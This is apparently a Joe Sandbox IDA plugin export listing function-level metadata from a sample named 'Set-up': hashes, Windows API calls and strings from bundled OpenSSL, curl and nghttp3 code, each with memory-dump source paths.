Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert$memcpy
String ID: i < blk->n$key_equal(ksl->compar, (nghttp3_ksl_key *)node->key, old_key)$ksl->head$nghttp3_ksl.c
API String ID: 3718630003-2514804127
Opcode ID: ea944ad30987660c82451b0730ee139b5a34fa5fdf1328b26e5e95e319679569
Instruction ID: 2b88603982472345f39dfb8cf73253753502dc784f14a06eae0487d532953423
Opcode Fuzzy Hash: ea944ad30987660c82451b0730ee139b5a34fa5fdf1328b26e5e95e319679569
Instruction Fuzzy Hash: 4241CC711042159FDB00DF1ADD80F5A7BE9FF6830CF4A4499E4898B262D731D889CF62

Function 00EC2370 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 86encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00EC238F
CertGetCertificateContextProperty.CRYPT32(00000000,0000000B,00000000), ref: 00EC23C4
GetLastError.KERNEL32 ref: 00EC2433

Part of subcall function 00EC2240: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,00EBF763,?,?,?,?,?), ref: 00EC2251
Part of subcall function 00EC2240: WideCharToMultiByte.KERNEL32 ref: 00EC2284
Part of subcall function 00EC2240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 00EC22BD

Strings

engines/e_capi_err.c, xrefs: 00EC2400
Error code= 0x, xrefs: 00EC244F
engines/e_capi.c, xrefs: 00EC23A4, 00EC2426, 00EC2466
ERR_CAPI_error, xrefs: 00EC23F9
%lX, xrefs: 00EC243E
capi_cert_get_fname, xrefs: 00EC2379

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ByteCertCertificateCharContextMultiPropertyWide$ErrorLastwcslen
String ID: %lX$ERR_CAPI_error$Error code= 0x$capi_cert_get_fname$engines/e_capi.c$engines/e_capi_err.c
API String ID: 3049598375-4146664032
Opcode ID: 26538f05689bfcc60e7884ce1a8685ab2485187c41e8cb0780433bf9de411a10
Instruction ID: fbcd578f639e2461983d9bc54dd92cc23fd0fd7e3cee8e4c107dfb98092df789
Opcode Fuzzy Hash: 26538f05689bfcc60e7884ce1a8685ab2485187c41e8cb0780433bf9de411a10
Instruction Fuzzy Hash: AD213DA57513057BF23036BA7C17F3B7A9C9741B0AF04143CFB08B91C7E99799198A62

Function 00E64960 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 381COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00E649A8
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00E64D44
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?), ref: 00E64E33

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

pass phrase, xrefs: 00E64A9C
No password method specified, xrefs: 00E64BA4
Prompt info data type incorrect, xrefs: 00E64BC7
crypto/passphrase.c, xrefs: 00E64AC8, 00E64B15, 00E64B65, 00E64B97, 00E64BBA, 00E64BF6, 00E64C2E, 00E64C53, 00E64C9C, 00E64CF7, 00E64D62, 00E64D8E, 00E64DA2, 00E64DB9, 00E64E13, 00E64E70
ossl_pw_get_passphrase, xrefs: 00E64B8D, 00E64BB0, 00E64C24
do_ui_passphrase, xrefs: 00E64B5B, 00E64BEC, 00E64C49, 00E64C92, 00E64CED, 00E64D19, 00E64D58, 00E64E69
info, xrefs: 00E649DE

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy$strcpystrlen
String ID: No password method specified$Prompt info data type incorrect$crypto/passphrase.c$do_ui_passphrase$info$ossl_pw_get_passphrase$pass phrase
API String ID: 699153967-1272933286
Opcode ID: 5fc53d74518b777e1aea8e82fe189b2a426944c8a36fcdd6f78c9c5704d78931
Instruction ID: 5e63ebc3fc565403b34b029283143f7fd7ea6d7abb3a2d7988926323cf66df66
Opcode Fuzzy Hash: 5fc53d74518b777e1aea8e82fe189b2a426944c8a36fcdd6f78c9c5704d78931
Instruction Fuzzy Hash: 99C108F4A84301BFD620BA61FC47F1B7AE8AB50B48F04682CF985762D3E6B1D8548653

Function 00CE48F0 Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 349COMMON

Download Yara Rule

APIs

memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE491A
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE497C
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE49F1
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4ABB
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4B21
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4BCF
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4C33
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,00000000,0000000B), ref: 00CE4CDD
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(0123456789,?,0000000B), ref: 00CE4D30

Strings

0123456789, xrefs: 00CE490D, 00CE4915, 00CE4977, 00CE49A2, 00CE49EC, 00CE4A0D, 00CE4AB6, 00CE4AE1, 00CE4B1C, 00CE4B3D, 00CE4BCA, 00CE4BF3, 00CE4C2E, 00CE4C4F, 00CE4CD8, 00CE4CF8, 00CE4D20, 00CE4D2B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memchr
String ID: 0123456789
API String ID: 3297308162-2793719750
Opcode ID: 8106f3a6cfe71e42fb89b1a51da58b67f3b8923570c6135e45a74cbd16abd4ba
Instruction ID: 8a44d2823022716a3b861d92692a2f7433cc8a9ed7cf0c108a1e8275c5db0e55
Opcode Fuzzy Hash: 8106f3a6cfe71e42fb89b1a51da58b67f3b8923570c6135e45a74cbd16abd4ba
Instruction Fuzzy Hash: D0B166316483D15BDB2A8E2784A07B67BC99F62744F1D80ADDCE49B3C3D729CE0A9711

Function 00DEA1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B4CA
Part of subcall function 00E5B4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B4D4
Part of subcall function 00E5B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00E67667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B53B
Part of subcall function 00E5B4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,00E67667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B5A1
Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B5B4
Part of subcall function 00E5B4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B648
Part of subcall function 00E5B4B0: WideCharToMultiByte.KERNEL32 ref: 00E5B67F

Part of subcall function 00E5B4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(00E67667,?,?,00000000,00000000,00000000,?,00E67667,OPENSSL_MODULES), ref: 00E5B504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DEA1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00DEA20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 00DEA25D

Strings

OSSL_QFILTER, xrefs: 00DEA1CA
ssl/quic/qlog.c, xrefs: 00DEA23E, 00DEA375, 00DEA38C
_%s.sqlog, xrefs: 00DEA2F0
server, xrefs: 00DEA2E7, 00DEA2EF
QLOGDIR, xrefs: 00DEA1BB
client, xrefs: 00DEA2E2
%02x, xrefs: 00DEA29F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: e93ed872ee140f4427e305c3d10b2a91557c9f52a1811da7026887fb7f9a48a0
Instruction ID: e58bca2c97ef309a79811928f9c38f85f875df27f3ead10fac0c7007a4b1b610
Opcode Fuzzy Hash: e93ed872ee140f4427e305c3d10b2a91557c9f52a1811da7026887fb7f9a48a0
Instruction Fuzzy Hash: 0D51F4A1E043966FEB10766A9C42B3B76D99F90705F084438FD89A7343F675FD0486B2

Function 00CA27E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00CA284C

Strings

Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00CA2DA3
Please URL encode %% as %%25, see RFC 6874., xrefs: 00CA29E3
%s%s%s, xrefs: 00CA2834
url.c, xrefs: 00CA2863, 00CA28B0, 00CA2CF9, 00CA2DDE
No valid port number in connect to host string (%s), xrefs: 00CA2C4B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: 518df8d524bc8f2d8a532105125523b4ec8444652112cfc952e985c81f0376ea
Instruction ID: 4b06ef68f7a0b9e371434196064f056c498d9d24b1f341b4817d891980cd0233
Opcode Fuzzy Hash: 518df8d524bc8f2d8a532105125523b4ec8444652112cfc952e985c81f0376ea
Instruction Fuzzy Hash: 9CA14870A043165FDB289E1CD845B7B7796AF9235CF08447DFCA94B292E7318E41E392

Function 00CBA260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 00CBA376
WSAGetLastError.WS2_32 ref: 00CBA380

Part of subcall function 00C878B0: closesocket.WS2_32(?), ref: 00C878BB

Part of subcall function 00CBEF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 00CBEF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00CBA3D6

Strings

getpeername() failed with errno %d: %s, xrefs: 00CBA3A0
accepted_set(sock=%d, remote=%s port=%d), xrefs: 00CBA488
cf-socket.c, xrefs: 00CBA2E9
ssrem inet_ntop() failed with errno %d: %s, xrefs: 00CBA3F4

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: a7f061e208cf62c8e54a9dc1665cd9b28f960d2735d8620383504a656578168c
Instruction ID: f242d70911498d96caa2b037b898d308016baba3d538acf1c384d167204c9592
Opcode Fuzzy Hash: a7f061e208cf62c8e54a9dc1665cd9b28f960d2735d8620383504a656578168c
Instruction Fuzzy Hash: EF51F731904740ABEB259F24CC46FE677B8AF85314F044518FD9D57252EB32A989CB93

Function 00D2A5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 00D2A5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 00D2A698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 00D2A6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 00D2A6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 00D2A700

Strings

i + 1 < blk->n, xrefs: 00D2A6E6
lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 00D2A6FB
nghttp3_ksl.c, xrefs: 00D2A6E1, 00D2A6F6

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: fa03de5cac0315c69a792005708456c63785f0f092dae58d206a7b4ad3364371
Instruction ID: e7126a6929ab22c3d092b25815b93ae43aece5a7602efc72d6a41f32a8935822
Opcode Fuzzy Hash: fa03de5cac0315c69a792005708456c63785f0f092dae58d206a7b4ad3364371
Instruction Fuzzy Hash: 124173766043059FC708DF18D98186AB7EAFFA8718F08C96DE8898B345E771ED11CB61

Function 00EC2480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00EC2491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00EC24C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00EBF5B4), ref: 00EC2529

Strings

engines/e_capi_err.c, xrefs: 00EC24F6
Error code= 0x, xrefs: 00EC2545
engines/e_capi.c, xrefs: 00EC24A6, 00EC251C, 00EC2559
ERR_CAPI_error, xrefs: 00EC24EF
%lX, xrefs: 00EC2534

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: 99f06859189f69e6d32ad98c661b7ca734709dd5c468e9a34b0a8fd852cb9f08
Instruction ID: 0242bf3453d26a1a8b0b1ff7df2cf939940590e6d2305684552ba6b4b46e0804
Opcode Fuzzy Hash: 99f06859189f69e6d32ad98c661b7ca734709dd5c468e9a34b0a8fd852cb9f08
Instruction Fuzzy Hash: 0511EEA5B953087BF13032B27C07F2B7E4CDB41B49F142428FA0C781C7F99395198A62

Function 0100AB00 Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AB11
GetFileAttributesA.KERNEL32 ref: 0100AB30
_fullpath.MSVCRT ref: 0100AB5D
strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0100AB65
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0100AB79
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC48
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC80
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC90
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0100AC9F

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
